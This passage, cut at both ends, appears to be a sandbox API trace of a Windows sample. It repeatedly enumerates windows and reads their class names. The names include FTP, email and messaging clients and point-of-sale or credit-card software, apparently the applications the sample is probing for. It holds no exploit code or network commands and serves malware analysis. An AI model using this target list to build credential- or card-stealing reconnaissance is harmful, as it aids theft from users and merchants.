out: lpClassName="TaskSwitcherWnd") returned 15 [0085.477] GetClassNameA (in: hWnd=0x400a8, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.477] GetClassNameA (in: hWnd=0x300e2, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.477] GetClassNameA (in: hWnd=0x400b6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.477] GetClassNameA (in: hWnd=0x101ce, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="SysFader") returned 8 [0085.477] GetClassNameA (in: hWnd=0x1012a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="ATL:000007FEF43852C0") returned 20 [0085.477] GetClassNameA (in: hWnd=0x10070, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.477] GetClassNameA (in: hWnd=0x1006e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.477] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.477] GetClassNameA (in: hWnd=0x10086, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.477] GetClassNameA (in: hWnd=0x10078, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.477] GetClassNameA (in: hWnd=0x10076, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.477] GetClassNameA (in: hWnd=0x10072, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.477] GetClassNameA (in: hWnd=0x10052, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Button") returned 6 [0085.477] GetClassNameA (in: hWnd=0x1004e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0085.477] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.477] GetClassNameA (in: hWnd=0x50092, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.477] GetClassNameA (in: hWnd=0x10088, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0085.477] GetClassNameA (in: hWnd=0x102a2, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Feelapp") returned 7 [0085.477] GetClassNameA (in: hWnd=0x8009c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0085.477] GetClassNameA (in: hWnd=0x102b0, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="edcsvr_win") returned 10 [0085.477] GetClassNameA (in: hWnd=0x102ae, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="fpos_wnd") returned 8 [0085.478] GetClassNameA (in: hWnd=0x102ac, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="isspos_cls") returned 10 [0085.478] GetClassNameA (in: hWnd=0x102aa, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="mxslipstream") returned 12 [0085.478] GetClassNameA (in: hWnd=0x102a8, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="omniposcls") returned 10 [0085.478] GetClassNameA (in: hWnd=0x102a6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="spcwinapp") returned 9 [0085.478] GetClassNameA (in: hWnd=0x102a4, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="spgagentserviceclass") returned 20 [0085.478] GetClassNameA (in: hWnd=0x300bc, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.478] GetClassNameA (in: hWnd=0x400c6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0085.478] GetClassNameA (in: hWnd=0x400e4, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0085.478] GetClassNameA (in: hWnd=0x300d4, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.478] GetClassNameA (in: hWnd=0x300c0, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.478] GetClassNameA (in: hWnd=0x400ba, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.478] GetClassNameA (in: hWnd=0x300a2, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0085.478] GetClassNameA (in: hWnd=0x102a0, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="creditservice_") returned 14 [0085.478] GetClassNameA (in: hWnd=0x1029e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="centralcreditcardclass") returned 22 [0085.478] GetClassNameA (in: hWnd=0x1029c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="ccv_serverwindow") returned 16 [0085.478] GetClassNameA (in: hWnd=0x1029a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="leechftpwindow") returned 14 [0085.478] GetClassNameA (in: hWnd=0x10298, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="icqwnd") returned 6 [0085.478] GetClassNameA (in: hWnd=0x10296, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="gmailnotifierpro_cls") returned 20 [0085.478] GetClassNameA (in: hWnd=0x10294, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="flingapp") returned 8 [0085.478] GetClassNameA (in: hWnd=0x10292, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="foxmailincmailclass") returned 19 [0085.478] GetClassNameA (in: hWnd=0x10290, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="flashfxp_") returned 9 [0085.479] GetClassNameA (in: hWnd=0x1028e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="filezilla_window") returned 16 [0085.479] GetClassNameA (in: hWnd=0x1028c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="farwin") returned 6 [0085.479] GetClassNameA (in: hWnd=0x1028a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="coreftpcls") returned 10 [0085.479] GetClassNameA (in: hWnd=0x10288, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="bitkinex_cls") returned 12 [0085.479] GetClassNameA (in: hWnd=0x10286, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="barcawindow") returned 11 [0085.479] GetClassNameA (in: hWnd=0x10284, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="alftpclass") returned 10 [0085.479] GetClassNameA (in: hWnd=0x5025c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="absolutetelnetcls") returned 17 [0085.479] GetClassNameA (in: hWnd=0x10238, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="aldelo_win") returned 10 [0085.479] GetClassNameA (in: hWnd=0x10264, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="3dftp_win") returned 9 [0085.479] GetClassNameA (in: hWnd=0x10258, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="active-chargeclass") returned 18 [0085.479] GetClassNameA (in: hWnd=0x1025a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="accupos_class") returned 13 [0085.479] GetClassNameA (in: hWnd=0x1023a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="smartftpwin") returned 11 [0085.479] GetClassNameA (in: hWnd=0x10256, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="yahoomessenger_win") returned 18 [0085.479] GetClassNameA (in: hWnd=0x10254, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="winscpwin") returned 9 [0085.479] GetClassNameA (in: hWnd=0x10252, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="whatsappcls") returned 11 [0085.479] GetClassNameA (in: hWnd=0x10250, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="webdrive_wnd") returned 12 [0085.479] GetClassNameA (in: hWnd=0x1024e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="trillianclass") returned 13 [0085.479] GetClassNameA (in: hWnd=0x1024c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="thunderbirdwnd") returned 14 [0085.479] GetClassNameA (in: hWnd=0x1024a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="skype_") returned 6 [0085.479] GetClassNameA (in: hWnd=0x10248, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="scriptftp_") returned 10 [0085.480] GetClassNameA (in: hWnd=0x10246, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="operamailclass") returned 14 [0085.480] GetClassNameA (in: hWnd=0x10244, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="notepadapp") returned 10 [0085.480] GetClassNameA (in: hWnd=0x10242, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="ncftp_window") returned 12 [0085.480] GetClassNameA (in: hWnd=0x10240, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="ThroughRecognize") returned 16 [0085.480] GetClassNameA (in: hWnd=0x1023e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="outlook") returned 7 [0085.480] GetClassNameA (in: hWnd=0x10236, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="utg2_cls") returned 8 [0085.480] GetClassNameA (in: hWnd=0x1023c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="afr38_wnd") returned 9 [0085.480] GetClassNameA (in: hWnd=0x2021c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Deadwnd") returned 7 [0085.480] GetClassNameA (in: hWnd=0x10232, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="than_wnd") returned 8 [0085.480] GetClassNameA (in: hWnd=0x10234, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="pidginwnd") returned 9 [0085.480] GetClassNameA (in: hWnd=0x1021a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="whosefirmThewin") returned 15 [0085.480] GetClassNameA (in: hWnd=0x10206, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="schoolforcls") returned 12 [0085.480] GetClassNameA (in: hWnd=0x10218, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="SeatraiseJoinwindow") returned 19 [0085.480] GetClassNameA (in: hWnd=0x10216, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="former_Build_present_app") returned 24 [0085.480] GetClassNameA (in: hWnd=0x10214, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="unit_Type_") returned 10 [0085.480] GetClassNameA (in: hWnd=0x10212, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="allow_app") returned 9 [0085.480] GetClassNameA (in: hWnd=0x10210, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Rate_app") returned 8 [0085.480] GetClassNameA (in: hWnd=0x1020e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Push_weight_wnd") returned 15 [0085.480] GetClassNameA (in: hWnd=0x1020c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="film_class") returned 10 [0085.480] GetClassNameA (in: hWnd=0x101fe, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Or_Finger_window") returned 16 [0085.481] GetClassNameA (in: hWnd=0x10204, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Travel_imagine_recently_wnd") returned 27 [0085.481] GetClassNameA (in: hWnd=0x101f6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Court_camera_cls") returned 16 [0085.481] GetClassNameA (in: hWnd=0x101f8, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="suffer_Exist_Rich_") returned 18 [0085.481] GetClassNameA (in: hWnd=0x201f0, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Or_level_cls") returned 12 [0085.481] GetClassNameA (in: hWnd=0x201f2, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Have_Return_physical_cls") returned 24 [0085.481] GetClassNameA (in: hWnd=0x101ee, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0085.481] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.481] GetClassNameA (in: hWnd=0x1019e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.481] GetClassNameA (in: hWnd=0x10182, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.481] GetClassNameA (in: hWnd=0x10180, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.481] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.481] GetClassNameA (in: hWnd=0x10170, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.482] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.482] GetClassNameA (in: hWnd=0x10152, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IEFrame") returned 7 [0085.482] GetClassNameA (in: hWnd=0x201e8, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0085.482] GetClassNameA (in: hWnd=0x101e6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0085.482] GetClassNameA (in: hWnd=0x201e2, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0085.482] GetClassNameA (in: hWnd=0x101d6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="ATL:733658F8") returned 12 [0085.482] GetClassNameA (in: hWnd=0x101bc, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0085.482] GetClassNameA (in: hWnd=0x101b0, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0085.482] GetClassNameA (in: hWnd=0x2018a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0085.482] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0085.482] GetClassNameA (in: hWnd=0x10158, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0085.482] GetClassNameA (in: hWnd=0x10154, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0085.482] GetClassNameA (in: hWnd=0x10150, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0085.482] GetClassNameA (in: hWnd=0x20140, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0085.482] GetClassNameA (in: hWnd=0x10134, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0085.482] GetClassNameA (in: hWnd=0x10132, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0085.482] GetClassNameA (in: hWnd=0x20128, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0085.482] GetClassNameA (in: hWnd=0x1011c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Media Center SSO") returned 16 [0085.482] GetClassNameA (in: hWnd=0x10114, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="ATL:000007FEFBCD41F0") returned 20 [0085.482] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0085.482] GetClassNameA (in: hWnd=0x10108, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0085.483] GetClassNameA (in: hWnd=0x60094, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0085.483] GetClassNameA (in: hWnd=0x10100, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0085.483] GetClassNameA (in: hWnd=0x100fa, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0085.483] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0085.483] GetClassNameA (in: hWnd=0x5008a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0085.483] GetClassNameA (in: hWnd=0x10080, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0085.483] GetClassNameA (in: hWnd=0x2007e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0085.483] GetClassNameA (in: hWnd=0x10074, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.483] GetClassNameA (in: hWnd=0x10062, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.483] GetClassNameA (in: hWnd=0x20018, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="#43") returned 3 [0085.483] GetClassNameA (in: hWnd=0x1005e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0085.483] GetClassNameA (in: hWnd=0x1004a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0085.483] GetClassNameA (in: hWnd=0x10042, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0085.483] GetClassNameA (in: hWnd=0x3003e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0085.483] GetClassNameA (in: hWnd=0x1007c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0085.483] GetClassNameA (in: hWnd=0x2001c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0085.483] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0085.483] GetClassNameA (in: hWnd=0x30124, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.483] GetClassNameA (in: hWnd=0x10050, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0085.483] GetClassNameA (in: hWnd=0x1004c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.483] GetClassNameA (in: hWnd=0x102dc, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102ea, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102e8, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102e6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102e4, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102e2, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102e0, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102de, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102da, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102d8, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102d6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102d4, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102d2, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102d0, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102ce, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102cc, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102ca, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102c8, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102c6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102c4, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102c2, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102c0, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.484] GetClassNameA (in: hWnd=0x102be, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x102bc, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x102ba, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x102b8, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x102b6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x102b4, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x102b2, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x1026c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x10282, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x10280, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x1027e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x1027c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x1027a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x10278, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x10276, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x10274, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x10272, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x10270, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x1026e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x1026a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x10268, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x10266, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x10262, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.485] GetClassNameA (in: hWnd=0x10260, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x1025e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x10230, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x1022e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x1022c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x1022a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x10228, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x10226, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x10224, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x10222, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x10220, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x1020a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x10208, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x10202, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x10200, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x101fc, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x101fa, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x10156, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x1011e, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x10116, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x2009a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.486] GetClassNameA (in: hWnd=0x2001a, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.487] GetClassNameA (in: hWnd=0x10040, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.487] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0085.487] GetClassNameA (in: hWnd=0x20016, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="IME") returned 3 [0085.487] Sleep (dwMilliseconds=0x64) [0085.607] EnumWindows (lpEnumFunc=0x3943dd0, lParam=0x27a0000) [0085.607] GetClassNameA (in: hWnd=0x30122, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0085.607] GetClassNameA (in: hWnd=0x400a8, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.607] GetClassNameA (in: hWnd=0x300e2, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.607] GetClassNameA (in: hWnd=0x400b6, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0085.607] GetClassNameA (in: hWnd=0x101ce, lpClassName=0x7edfa00, nMaxCount=260 | out: lpClassName="SysFader") returned 8 [0085.607] GetClassNameA (in: 